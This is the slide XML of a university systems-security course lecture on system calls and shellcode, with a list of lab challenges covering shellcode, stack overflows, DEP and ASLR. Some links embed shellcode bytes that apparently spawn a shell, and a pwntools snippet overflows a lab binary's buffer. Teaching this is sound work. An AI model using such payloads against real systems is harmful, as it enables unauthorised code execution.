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2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1556" r:id="rId3"/>
    <p:sldId id="1616" r:id="rId4"/>
    <p:sldId id="1560" r:id="rId5"/>
    <p:sldId id="1503" r:id="rId6"/>
    <p:sldId id="542" r:id="rId7"/>
    <p:sldId id="1191" r:id="rId8"/>
    <p:sldId id="1210" r:id="rId9"/>
    <p:sldId id="1211" r:id="rId10"/>
    <p:sldId id="1504" r:id="rId11"/>
    <p:sldId id="581" r:id="rId12"/>
    <p:sldId id="580" r:id="rId13"/>
    <p:sldId id="1506" r:id="rId14"/>
    <p:sldId id="1507" r:id="rId15"/>
    <p:sldId id="535" r:id="rId16"/>
    <p:sldId id="1570" r:id="rId17"/>
    <p:sldId id="1508" r:id="rId18"/>
    <p:sldId id="549" r:id="rId19"/>
    <p:sldId id="1571" r:id="rId20"/>
    <p:sldId id="1572" r:id="rId21"/>
    <p:sldId id="1573" r:id="rId22"/>
    <p:sldId id="1574" r:id="rId23"/>
    <p:sldId id="554" r:id="rId24"/>
    <p:sldId id="1535" r:id="rId25"/>
    <p:sldId id="1575" r:id="rId26"/>
    <p:sldId id="1476" r:id="rId27"/>
    <p:sldId id="1477" r:id="rId28"/>
    <p:sldId id="1478" r:id="rId29"/>
    <p:sldId id="1576" r:id="rId30"/>
    <p:sldId id="1577" r:id="rId31"/>
    <p:sldId id="1578" r:id="rId32"/>
    <p:sldId id="1481" r:id="rId33"/>
    <p:sldId id="478" r:id="rId34"/>
    <p:sldId id="479" r:id="rId35"/>
    <p:sldId id="480" r:id="rId36"/>
    <p:sldId id="122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578BBF-A26B-744B-A859-FCCA7242000B}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="1556"/>
            <p14:sldId id="1616"/>
            <p14:sldId id="1560"/>
            <p14:sldId id="1503"/>
            <p14:sldId id="542"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="ABI" id="{3D1DEB3D-0346-8F47-9CFA-99E3F84FEE10}">
          <p14:sldIdLst>
            <p14:sldId id="1191"/>
            <p14:sldId id="1210"/>
            <p14:sldId id="1211"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="System calls" id="{359E7294-71E9-6F48-B200-2568953802F4}">
          <p14:sldIdLst>
            <p14:sldId id="1504"/>
            <p14:sldId id="581"/>
            <p14:sldId id="580"/>
            <p14:sldId id="1506"/>
            <p14:sldId id="1507"/>
            <p14:sldId id="535"/>
            <p14:sldId id="1570"/>
            <p14:sldId id="1508"/>
            <p14:sldId id="549"/>
            <p14:sldId id="1571"/>
            <p14:sldId id="1572"/>
            <p14:sldId id="1573"/>
            <p14:sldId id="1574"/>
            <p14:sldId id="554"/>
            <p14:sldId id="1535"/>
            <p14:sldId id="1575"/>
            <p14:sldId id="1476"/>
            <p14:sldId id="1477"/>
            <p14:sldId id="1478"/>
            <p14:sldId id="1576"/>
            <p14:sldId id="1577"/>
            <p14:sldId id="1578"/>
            <p14:sldId id="1481"/>
            <p14:sldId id="478"/>
            <p14:sldId id="479"/>
            <p14:sldId id="480"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Backup" id="{A999AC4C-DDF8-5F4C-B297-F8667D7D881C}">
          <p14:sldIdLst>
            <p14:sldId id="122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60"/>
    <p:restoredTop sz="84879"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="182" d="100"/>
          <a:sy n="182" d="100"/>
        </p:scale>
        <p:origin x="26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e, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}"/>
    <pc:docChg chg="delSld modSld delSection modSection">
      <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:23.530" v="18" actId="17851"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:46:30.532" v="3" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2958764332" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:46:30.532" v="3" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2958764332" sldId="256"/>
            <ac:spMk id="3" creationId="{8478EFD8-8810-7C4B-9D51-E4795820E15B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.862" v="15" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4248865950" sldId="555"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.851" v="11" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3997343989" sldId="558"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.858" v="14" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="205697526" sldId="559"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.868" v="16" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1917347119" sldId="563"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.838" v="10" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="556818668" sldId="1554"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.853" v="13" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="693402363" sldId="1564"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.852" v="12" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2568952448" sldId="1568"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:51:16.876" v="17" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2141475224" sldId="1569"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:47:02.310" v="9" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2755465115" sldId="1616"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jee, Kangkook" userId="52832784-bd9f-4cfd-947b-6cb8258050c1" providerId="ADAL" clId="{02DAE1BB-3510-5996-8DD1-1B9338245307}" dt="2026-09-17T16:47:02.310" v="9" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2755465115" sldId="1616"/>
            <ac:spMk id="3" creationId="{7EE427FC-A6A3-C84A-A073-DDDFDE4D076A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09T21:43:31.1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15471 14668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3T15:07:53.1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12022 9501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2E2B7-359E-A14D-BE7E-BD661B57668C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CDBD7-6B05-C04B-8887-50A240926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78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ldp.org/HOWTO/Assembly-HOWTO/hello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ldp.org/HOWTO/Assembly-HOWTO/hello.html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hell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=%5Cx31%5Cxc0%5Cx48%5Cxbb%5Cxd1%5Cx9d%5Cx96%5Cx91%5Cxd0%5Cx8c%5Cx97%5Cxff%5Cx48%5Cxf7%5Cxdb%5Cx53%5Cx54%5Cx5f%5Cx99%5Cx52%5Cx57%5Cx54%5Cx5e%5Cxb0%5Cx3b%5Cx0f%5Cx05&amp;arch=x86-32&amp;endianness=little&amp;dis_with_addr=True&amp;dis_with_raw=True&amp;dis_with_ins=True#disassembly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0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-2.html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exploit-db.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=%5Cx31%5Cxc0%5Cx48%5Cxbb%5Cxd1%5Cx9d%5Cx96%5Cx91%5Cxd0%5Cx8c%5Cx97%5Cxff%5Cx48%5Cxf7%5Cxdb%5Cx53%5Cx54%5Cx5f%5Cx99%5Cx52%5Cx57%5Cx54%5Cx5e%5Cxb0%5Cx3b%5Cx0f%5Cx05&amp;arch=x86-32&amp;endianness=little&amp;dis_with_addr=True&amp;dis_with_raw=True&amp;dis_with_ins=True#disassembly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X86_Assembly/Interfacing_with_Linux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53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60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89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38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FFA88-A4DB-5445-97A9-35337ED10A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29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7FFA88-A4DB-5445-97A9-35337ED10A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83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05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hello world assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tldp.org/HOWTO/Assembly-HOWTO/hello.html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16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hello world assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tldp.org/HOWTO/Assembly-HOWTO/hello.html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709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05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66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://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=%5Cx31%5Cxc0%5Cx48%5Cxbb%5Cxd1%5Cx9d%5Cx96%5Cx91%5Cxd0%5Cx8c%5Cx97%5Cxff%5Cx48%5Cxf7%5Cxdb%5Cx53%5Cx54%5Cx5f%5Cx99%5Cx52%5Cx57%5Cx54%5Cx5e%5Cxb0%5Cx3b%5Cx0f%5Cx05&amp;arch=x86-32&amp;endianness=little&amp;dis_with_addr=True&amp;dis_with_raw=True&amp;dis_with_ins=True#disassembl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3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" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>https://www.tutorialspoint.com/assembly_programming/assembly_system_calls.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-2.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=%5Cx31%5Cxc0%5Cx48%5Cxbb%5Cxd1%5Cx9d%5Cx96%5Cx91%5Cxd0%5Cx8c%5Cx97%5Cxff%5Cx48%5Cxf7%5Cxdb%5Cx53%5Cx54%5Cx5f%5Cx99%5Cx52%5Cx57%5Cx54%5Cx5e%5Cxb0%5Cx3b%5Cx0f%5Cx05&amp;arch=x86-32&amp;endianness=little&amp;dis_with_addr=True&amp;dis_with_raw=True&amp;dis_with_ins=True#disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/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1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34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https://en.wikibooks.org/wiki/X86_Assembly/Interfacing_with_Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>execv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1B9106-28DF-44D8-A3AF-43B712FBE4B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67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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>security.stackexchange.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/questions/184871/why-do-we-need-to-remove-null-bytes-from-shell-code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr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are correct in this situation;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strcpy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(or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memcpy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will indeed stop reading when it reaches a null byte, Of course</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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null bytes are valid machine code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1B9106-28DF-44D8-A3AF-43B712FBE4B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51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94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TODO: NOP in ARM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3725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12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3E13-B930-C442-B5A0-DBFE80F5A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D3148-9269-594F-8CDF-636BADD61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E0794-D532-5B4A-A00E-F3B798D0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F40B-392C-864C-8CE6-4821FEA98F59}" type="datetime1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8AF7E-6ADE-B544-8080-5CC455F65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6B4AA-D615-DC49-9B8B-7F68994B5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23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37D09-2C0A-2844-A4C7-BF177ADD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CAD22-BA20-8E41-A182-252656FD3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5CCF4-8BC8-D64C-B167-6E3D62506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D6A2F-0452-D140-9BC5-F96026489BD4}" type="datetime1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1FEBA-4374-E444-882E-01A2ED24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395CC-F3A8-4B48-A5EF-9D1D04D74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8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44AC-20F3-3D4B-879F-339C34A46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33EA2-4F30-C843-8D22-7835DE1C8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B0028-6CBE-CD45-B2F8-8DBC0FD4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E57B3-B4F3-CD49-B884-82C5D7933264}" type="datetime1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5029C-FC7B-734F-A735-F28ADE82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0C5B3-93DC-8944-8189-0DB8BA8F2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A7584-0FA1-9E41-951A-39D4471F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69534-9448-3940-854E-ED4F219D3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D5CA40-757E-2544-8E38-451AA0842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74435-5D02-F74D-BB50-D7A7EC1D3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C7779-0BD1-8945-851D-5B438777AD36}" type="datetime1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C644F-2B16-FC44-97F1-3B63B25D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F3EEE-2D1E-6F43-804B-E145A872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4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69D83-BA61-8F4B-9213-5D0631C34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9BE70-3749-854A-AA0E-587B9B650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D4CE0-2857-9945-BCA5-423C4E7A3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4599E3-2AD5-4A4B-BBB9-AB814B07A0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BA55A9-ACCF-BD44-B277-C176637264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CE4807-CB8E-FB46-9273-6ECA0FBCF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4DD0-E36F-2F42-ABD7-356C3EDD1132}" type="datetime1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D9F042-D840-8046-BECE-6947FE261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6E4E5D-E68B-8D4C-A72E-C153C8097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8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A796-0B86-F641-8713-F498C571B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A6A9CA-2BD7-0948-AA82-A7CF97F2D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6557-224C-3B49-BECF-5CDA062B2D2B}" type="datetime1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9FEDB-9E01-8044-99AA-9796E84F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8C248-5301-D349-83CD-CBDAB6244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4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D06F5C-239C-F54C-9626-866EC698F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23BD-551E-1444-928B-23B464F43074}" type="datetime1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FEC31C-E11C-D04F-9AEB-C369B0309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D2684-F7E5-134F-BB56-4992C5368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9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C940-3741-6544-8942-121B70D07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6D367-E6EF-C043-AB82-290A21CE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73C48-76BE-5444-A293-5C84D0221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D369D-0B12-D441-B181-4AEC1515E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092E-C8F8-3343-8BFF-47B563563875}" type="datetime1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B08A4-8EE3-C04D-8F3E-06707592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91AF9-47BC-3C45-9AB8-0723E139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D4CD-3C78-B141-8529-81E12580B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F95C8D-0D98-1B48-A6E5-2DA4EB813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1F639-4AFC-EE49-A392-DEE9864AE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16CA4-2780-CD4C-A4E7-A0670CAF0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807A7-B038-4846-8FEF-7B0A1A7D11AF}" type="datetime1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84535-4C34-524C-93AE-CDEE931C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1E9E17-79F5-1845-A2F2-21FA679D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5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419E1-49E1-7E4E-BA00-79F5308E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9C20B-394B-1540-8C23-A6FB55642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E7A9C-8865-B54A-8874-4C527A808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23345-F2CE-6843-AA3B-C45721D8DB64}" type="datetime1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5577C-8F36-D342-AD27-0CD989C9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A1A32-969A-C547-9F39-E356C28E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3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FEF7F9-1B9C-9E46-9CD6-AF6EF0472F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2507BE-2740-9647-8DE3-9208E3BBF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35EBE-4F42-2343-8705-B71EB2288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6EA5-8C3E-624A-8B8D-52154DA33110}" type="datetime1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67660-E04E-1E41-9766-CFAB34860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B825-D703-1147-88D1-2168411E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57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A1C7F7-7146-9F4C-87E5-446E1AFC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280C4-1BD2-9345-BAA7-170EBD126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289B6-C67D-0D4A-BC4F-706CEBCB2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A7F6C-E3CD-184D-9CFE-337E0552E75C}" type="datetime1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FF89C-CEC0-AA47-971D-AEC36EEA7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E2E7C-2308-9F42-9B58-6DB32CDA5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F18A-9954-484C-AE64-B4E0E217F4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CS 6332.001: Systems Security and Malware Code Analysis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Week 04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8EFD8-8810-7C4B-9D51-E4795820E1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Kangkook Jee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sep 17,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AEE9E-8F97-1F44-895C-E623AAE3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6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B5B57-CE0A-7B40-A740-740D621A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2824343" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unit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76FB22-9373-C34E-959D-D001A756A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61850"/>
            <a:ext cx="5157787" cy="823912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Intel (i386 / AMD64)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A333D1-C081-BA40-B703-EA46FA391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986547" cy="3684588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>01-shellcode-32: 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>02-shellcode-64: 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>03-nonzero-shellcode-32: 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>04-nonzero-shellcode-64: 15 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>05-short-shellcode-64: 20 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>06-ascii-shellcode-64: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="gg mon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339B99-228E-334A-A285-38F98982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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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A905FA0-E22B-0D3E-29F6-A317D044162F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869302" y="5023711"/>
            <a:ext cx="4542657" cy="1515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gg mono"/>
              </a:rPr>
              <a:t>10-stack-ovfl-sc-32: 15 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>11-stack-ovfl-sc-64: 15 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>12-stack-ovfl-use-envp-32: 20 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>13-stack-ovfl-no-envp-64: 20 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2DDC4CD8-E508-42C1-B0D9-C42776C513CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2185762"/>
            <a:ext cx="3986548" cy="1209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gg mono"/>
              </a:rPr>
              <a:t>20-stack-cookie: 20 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>21-dep-0: 15 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>22-dep-1: 20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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56DC4A0-DCBB-62BF-ADEE-60D5716A9BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298675" y="5097125"/>
            <a:ext cx="5157786" cy="132184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Be ready for bonus challenges!!!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59EA305-93A9-99EE-854F-89E6F046CD27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3468950"/>
            <a:ext cx="3986548" cy="1483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gg mono"/>
              </a:rPr>
              <a:t>aslr-1: 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="gg mono"/>
              </a:rPr>
              <a:t>aslr-2: 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>aslr-3: 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>aslr-4: 20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407213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49870-E658-2445-940C-AD328449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427FC-A6A3-C84A-A073-DDDFDE4D0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490601" cy="42672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Due: Sep 24, midnight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write-ups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Due: Sep 25, midnight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) for shellcode challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to run the solution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NO ‘read()’ system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Submission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> menu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zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tar.gz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AEB441-2E2B-3141-9F03-4ED353E48144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6328800" y="3507564"/>
            <a:ext cx="5652000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
              <a:alpha val="42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#!/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usr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/bin/env python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              <a:ea typeface="Fira Code" panose="020B08090500000200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from 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pwn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 import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              <a:ea typeface="Fira Code" panose="020B08090500000200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p = process("./bof-level1")</a:t>
            </a:r>
          </a:p>
          <a:p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print(</a:t>
            </a:r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p.recv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p.sendline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("A" * 32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              <a:ea typeface="Fira Code" panose="020B08090500000200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p.interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()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2CD3BB-3412-4E4E-A334-2A5547714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800" y="850515"/>
            <a:ext cx="3619500" cy="2225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A049CD-5099-7D4E-A6D4-20F577017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8800" y="545715"/>
            <a:ext cx="36195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6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68B5B02-F423-CFD3-4F86-3C9F593D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Solve Unit2?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4008114-317D-BFA8-8DA0-4E0428146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https://cs6332.syssec.org/l/week04/shellcode-template.tar.bz2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/home/labs/shellcode-template.tar.bz2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19260-C3F2-C86A-6E1F-465F54138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22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D6564-EC67-2A4B-0FDA-3164A6546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Previous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1A596-5787-99E3-7E9E-B52AF548D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Data encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
